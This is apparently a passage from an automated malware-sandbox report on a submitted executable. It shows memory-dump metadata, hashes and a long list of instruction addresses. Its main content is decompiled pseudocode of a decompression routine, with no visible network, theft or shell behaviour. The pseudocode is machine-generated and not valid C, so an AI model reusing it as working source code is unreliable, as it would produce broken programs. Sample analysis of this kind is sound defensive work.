							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                0x00000000
                0x004066b9
                0x004066b9
                0x004066bd
                0x004066e2
                0x004066ec
                0x00000000
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c6
                0x004066c9
                0x004066cc
                0x004066d0
                0x004066d0
                0x004066d3
                0x004067ad
                0x004067ad
                0x004067b4
                0x004067b4
                0x004067b7
                0x004067be
                0x004067eb
                0x004067ef
                0x0040684f
                0x00406852
                0x00406857
                0x00406858
                0x0040685a
                0x0040685c
                0x0040685f
                0x0040676b
                0x0040676b
                0x0040676b
                0x00405f07
                0x00405f07
                0x00405f07
                0x00405f10
                0x00000000
                0x00000000
                0x00405f16
                0x00000000
                0x00405f21
                0x00000000
                0x00000000
                0x00405f2a
                0x00405f2d
                0x00405f30
                0x00405f34
                0x00000000
                0x00000000
                0x00405f3a
                0x00405f3d
                0x00405f3f
                0x00405f40
                0x00405f43
                0x00405f45
                0x00405f46
                0x00405f48
                0x00405f4b
                0x00405f50
                0x00405f55
                0x00405f5e
                0x00405f71
                0x00405f74
                0x00405f80
                0x00405fa8
                0x00405faa
                0x00405fb8
                0x00405fb8
                0x00405fbc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405fac
                0x00405fac
                0x00405faf
                0x00405fb0
                0x00405fb0
                0x00000000
                0x00405fac
                0x00405f86
                0x00405f8b
                0x00405f8b
                0x00405f94
                0x00405f9c
                0x00405f9f
                0x00000000
                0x00405fa5
                0x00405fa5
                0x00000000
                0x00405fa5
                0x00000000
                0x00405fc2
                0x00405fc2
                0x00405fc6
                0x00406872
                0x00000000
                0x00406872
                0x00405fcf
                0x00405fdf
                0x00405fe2
                0x00405fe5
                0x00405fe5
                0x00405fe5
                0x00405fe8
                0x00405fec
                0x00000000
                0x00000000
                0x00405fee
                0x00405ff4
                0x0040601e
                0x00406024
                0x0040602b
                0x00000000
                0x0040602b
                0x00405ffa
                0x00405ffd
                0x00406002
                0x00406002
                0x0040600d
                0x00406015
                0x00406018
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040605d
                0x00406063
                0x00406066
                0x00406073
                0x0040607b
                0x00000000
                0x00000000
                0x00406032
                0x00406032
                0x00406036
                0x00406881
                0x00000000
                0x00406881
                0x00406042
                0x0040604d
                0x0040604d
                0x0040604d
                0x00406050
                0x00406053
                0x00406056
                0x0040605b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066f2
                0x004066f2
                0x004066f8
                0x004066fe
                0x00406704
                0x0040671e
                0x00406721
                0x00406727
                0x00406732
                0x00406732
                0x00406734
                0x00406706
                0x00406706
                0x00406715
                0x00406719
                0x00406719
                0x0040673e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406740
                0x00406744
                0x004068f3
                0x00000000
                0x004068f3
                0x00406750
                0x00406757
                0x0040675f
                0x00406762
                0x00406765
                0x00406765
                0x00000000
                0x00000000
                0x00406083
                0x00406085
                0x00406088
                0x004060f9
                0x004060fc
                0x004060ff
                0x00406106
                0x00406110
                0x00000000
                0x00406110
                0x0040608a
                0x0040608e
                0x00406091
                0x00406093
                0x00406096
                0x00406099
                0x0040609b
                0x0040609e
                0x004060a0
                0x004060a5
                0x004060a8
                0x004060ab
                0x004060af
                0x004060b6
                0x004060b9
                0x004060c0
                0x004060c4
                0x004060cc
                0x004060cc
                0x004060cc
                0x004060c6
                0x004060c6
                0x004060c6
                0x004060bb
                0x004060bb
                0x004060bb
                0x004060d0
                0x004060d3
                0x004060f1
                0x004060f3
                0x00000000
                0x004060d5
                0x004060d5
                0x004060d8
                0x004060db
                0x004060de
                0x004060e0
                0x004060e0
                0x004060e0
                0x004060e3
                0x004060e6
                0x004060e8
                0x004060e9
                0x004060ec
                0x00000000
                0x004060ec
                0x00000000
                0x00406322
                0x00406326
                0x00406344
                0x00406347
                0x0040634e
                0x00406351
                0x00406354
                0x00406357
                0x0040635a
                0x0040635d
                0x0040635f
                0x00406366
                0x00406367
                0x00406369
                0x0040636c
                0x0040636f
                0x00406372
                0x00406372
                0x00406377
                0x00000000
                0x00406377
                0x00406328
                0x0040632b
                0x0040632e
                0x00406338
                0x00000000
                0x00000000
                0x0040638c
                0x00406390
                0x004063b3
                0x004063b6
                0x004063b9
                0x004063c3
                0x00406392
                0x00406392
                0x00406395
                0x00406398
                0x0040639b
                0x004063a8
                0x004063ab
                0x004063ab
                0x00000000
                0x00000000
                0x004063cf
                0x004063d3
                0x00000000
                0x00000000
                0x004063d9
                0x004063dd
                0x00000000
                0x00000000
                0x004063e3
                0x004063e5
                0x004063e9
                0x004063e9
                0x004063ec
                0x004063f0
                0x00000000
                0x00000000
                0x00406440
                0x00406444
                0x0040644b
                0x0040644e
                0x00406451
                0x0040645b
                0x00000000
                0x0040645b
                0x00406446
                0x00000000
                0x00000000
                0x00406467
                0x0040646b
                0x00406472
                0x00406475
                0x00406478
                0x0040646d
                0x0040646d
                0x0040646d
                0x0040647b
                0x0040647e
                0x00406481
                0x00406481
                0x00406484
                0x00406487
                0x0040648a
                0x0040648a
                0x0040648d
                0x00406494
                0x00406499
                0x00000000
                0x00000000
                0x00406527
                0x00406527
                0x0040652b
                0x004068c9
                0x00000000
                0x004068c9
                0x00406531
                0x00406534
                0x00406537
                0x0040653b
                0x0040653e
                0x00406544
                0x00406546
                0x00406546
                0x00406546
                0x00406549
                0x0040654c
                0x00000000
                0x00000000
                0x0040611c
                0x0040611c
                0x00406120
                0x0040688d
                0x00000000
                0x0040688d
                0x00406126
                0x00406129
                0x0040612c
                0x00406130
                0x00406133
                0x00406139
                0x0040613b
                0x0040613b
                0x0040613b
                0x0040613e
                0x00406141
                0x00406141
                0x00406144
                0x00406147
                0x00000000
                0x00000000
                0x0040614d
                0x00406153
                0x00000000
                0x00000000
                0x00406159
                0x00406159
                0x0040615d
                0x00406160
                0x00406163
                0x00406166
                0x00406169
                0x0040616a
                0x0040616d
                0x0040616f
                0x00406175
                0x00406178
                0x0040617b
                0x0040617e
                0x00406181
                0x00406184
                0x00406187
                0x004061a3
                0x004061a6
                0x004061a9
                0x004061ac
                0x004061b3
                0x004061b7
                0x004061b9
                0x004061bd
                0x00406189
                0x00406189
                0x0040618d
                0x00406195
                0x0040619a
                0x0040619c
                0x0040619e
                0x0040619e
                0x004061c0
                0x004061c7
                0x004061ca
                0x00000000
                0x004061d0
                0x00000000
                0x004061d0
                0x00000000
                0x004061d5
                0x004061d5
                0x004061d9
                0x00406899
                0x00000000
                0x00406899
                0x004061df
                0x004061e2
                0x004061e5
                0x004061e9
                0x004061ec
                0x004061f2
                0x004061f4
                0x004061f4
                0x004061f4
                0x004061f7
                0x004061fa
                0x004061fa
                0x004061fa
                0x00406200
                0x00000000
                0x00000000
                0x00406202
                0x00406205
                0x00406208
                0x0040620b
                0x0040620e
                0x00406211
                0x00406214
                0x00406217
                0x0040621a
                0x0040621d
                0x00406220
                0x00406238
                0x0040623b
                0x0040623e
                0x00406241
                0x00406241
                0x00406244
                0x00406248
                0x0040624a
                0x00406222
                0x00406222
                0x0040622a
                0x0040622f
                0x00406231
                0x00406233
                0x00406233
                0x0040624d
                0x00406254
                0x00406257
                0x00000000
                0x00406259
                0x00000000
                0x00406259
                0x00406257
                0x0040625e
                0x0040625e
                0x0040625e
                0x0040625e
                0x00000000
                0x00000000
                0x00406299
                0x00406299
                0x0040629d
                0x004068a5
                0x00000000
                0x004068a5
                0x004062a3
                0x004062a6
                0x004062a9
                0x004062ad
                0x004062b0
                0x004062b6
                0x004062b8
                0x004062b8
                0x004062b8
                0x004062bb
                0x004062be
                0x004062be
                0x004062c4
                0x00406262
                0x00406262
                0x00406265
                0x00000000
                0x00406265
                0x004062c6
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062db
                0x004062de
                0x004062e1
                0x004062e4
                0x004062fc
                0x004062ff
                0x00406302
                0x00406305
                0x00406305
                0x00406308
                0x0040630c
                0x0040630e
                0x004062e6
                0x004062e6
                0x004062ee
                0x004062f3
                0x004062f5
                0x004062f7
                0x004062f7
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x0040631d
                0x00000000
                0x0040631d
                0x00000000
                0x004065aa
                0x004065aa
                0x004065ae
                0x004068d5
                0x00000000
                0x004068d5
                0x004065b4
                0x004065b7
                0x004065ba
                0x004065be
                0x004065c1
                0x004065c7
                0x004065c9
                0x004065c9
                0x004065c9
                0x004065cc
                0x00000000
                0x00000000
                0x0040637a
                0x0040637a
                0x0040637d
                0x004066ef
                0x004066ef
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406776
                0x0040677a
                0x00406798
                0x00406798
                0x00406798
                0x0040679f
                0x004067a6
                0x00000000
                0x004067a6
                0x0040677c
                0x0040677f
                0x00406782
                0x00406785
                0x0040678c
                0x00000000
                0x00000000
                0x00406867
                0x0040686a
                0x0040676b
                0x0040676b
                0x00000000
                0x00000000
                0x004064a1
                0x004064a3
                0x004064aa
                0x004064ab
                0x004064ad
                0x004064b0
                0x00000000
                0x00000000
                0x004064b8
                0x004064bb
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c2
                0x004064c3
                0x004064c6
                0x004064cd
                0x004064d0
                0x004064de
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004067c3
                0x004067c3
                0x004067c7
                0x004068ff
                0x00000000
                0x004068ff
                0x004067cd
                0x004067d0
                0x004067d3
                0x004067d7
                0x004067da
                0x004067e0
                0x004067e2
                0x004067e2
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067e8
                0x00000000
                0x00000000
                0x004064e6
                0x004064e9
                0x0040651f
                0x0040664f
                0x0040664f
                0x0040664f
                0x0040664f
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x004068e1
                0x00000000
                0x004068e1
                0x0040665d
                0x00406660
                0x00000000
                0x00000000
                0x00406666
                0x0040666a
                0x0040666d
                0x0040666d
                0x0040666d
                0x00000000
                0x0040666d
                0x004064eb
                0x004064ed
                0x004064ef
                0x004064f1
                0x004064f4
                0x004064f5
                0x004064f7
                0x004064f9
                0x004064fc
                0x004064ff
                0x00406515
                0x0040651a
                0x00406552
                0x00406552
                0x00406556
                0x00406582
                0x00406584
                0x0040658b
                0x0040658e
                0x00406591
                0x00406591
                0x00406596
                0x00406596
                0x00406598
                0x0040659b
                0x004065a2
                0x004065a5
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x0040664c
                0x0040664c
                0x0040664c
                0x00000000
                0x0040664c
                0x004065da
                0x004065e0
                0x004065e3
                0x004065e6
                0x004065e9
                0x004065ec
                0x004065ef
                0x004065f2
                0x004065f5
                0x004065f8
                0x004065fb
                0x00406614
                0x00406616
                0x00406619
                0x0040661a
                0x0040661d
                0x0040661f
                0x00406622
                0x00406624
                0x00406626
                0x00406629
                0x0040662b
                0x0040662e
                0x00406632
                0x00406634
                0x00406634
                0x00406635
                0x00406638
                0x0040663b
                0x004065fd
                0x004065fd
                0x00406605
                0x0040660a
                0x0040660c
                0x0040660f
                0x0040660f
                0x0040663e
                0x00406645
                0x004065cf
                0x004065cf
                0x004065cf
                0x004065cf
                0x00000000
                0x00406647
                0x00000000
                0x00406647
                0x00406645
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406563
                0x00406566
                0x00406568
                0x0040656b
                0x0040656e
                0x0040656e
                0x00406571
                0x00406571
                0x00406574
                0x0040657b
                0x0040654f
                0x0040654f
                0x0040654f
                0x0040654f
                0x00000000
                0x0040657d
                0x00000000
                0x0040657d
                0x0040657b
                0x00406501
                0x00406504
                0x00406506
                0x00406509
                0x00000000
                0x00000000
                0x00406268
                0x00406268
                0x0040626c
                0x004068b1
                0x00000000
                0x004068b1
                0x00406272
                0x00406275
                0x00406278
                0x0040627b
                0x0040627e
                0x00406281
                0x00406284
                0x00406286
                0x00406289
                0x0040628c
                0x0040628f
                0x00406291
                0x00406291
                0x00406291
                0x00000000
                0x00000000
                0x004063f3
                0x004063f3
                0x004063f7
                0x004068bd
                0x00000000
                0x004068bd
                0x004063fd
                0x00406400
                0x00406403
                0x00406406
                0x00406408
                0x00406408
                0x00406408
                0x0040640b
                0x0040640e
                0x00406411
                0x00406414
                0x00406417
                0x0040641a
                0x0040641b
                0x0040641d
                0x0040641d
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x00406429
                0x00406429
                0x0040642c
                0x0040642e
                0x0040642e
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x00406431
                0x00406431
                0x00000000
                0x00406431
                0x004066b2
                0x004068e7
                0x00406909
                0x0040690f
                0x00406911
                0x00406918
                0x0040691a
                0x00406921
                0x00406925
                0x00000000
                0x00405f16
                0x0040691e
                0x0040691e
                0x00000000
                0x0040691e
                0x0040676b
                0x004067f1
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406800
                0x00406803
                0x00406806
                0x00406809
                0x0040680c
                0x00406812
                0x0040682b
                0x0040682e
                0x00406831
                0x00406834
                0x00406838
                0x0040683a
                0x0040683b
                0x0040683e
                0x00406814
                0x00406814
                0x0040681c
                0x00406821
                0x00406823
                0x00406826
                0x00406826
                0x00406848
                0x00000000
                0x0040684a
                0x00000000
                0x0040684a
                0x00406848
                0x00000000
                0x004066bd

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6c3c742c09450cbd9cdceaab41d3d05724668c311a364285e3bc9e665de74165
                • Instruction ID: d4317c89d1632f45c632c26a697e2fc4357ac15b25f122c790db5755eb07ebec
                • Opcode Fuzzy Hash: 6c3c742c09450cbd9cdceaab41d3d05724668c311a364285e3bc9e665de74165
                • Instruction Fuzzy Hash: 83913171D00229CBDF28CF98C854BADBBB1FB44309F15816AD856BB281C7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004063CF Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E004063CF() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406926))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
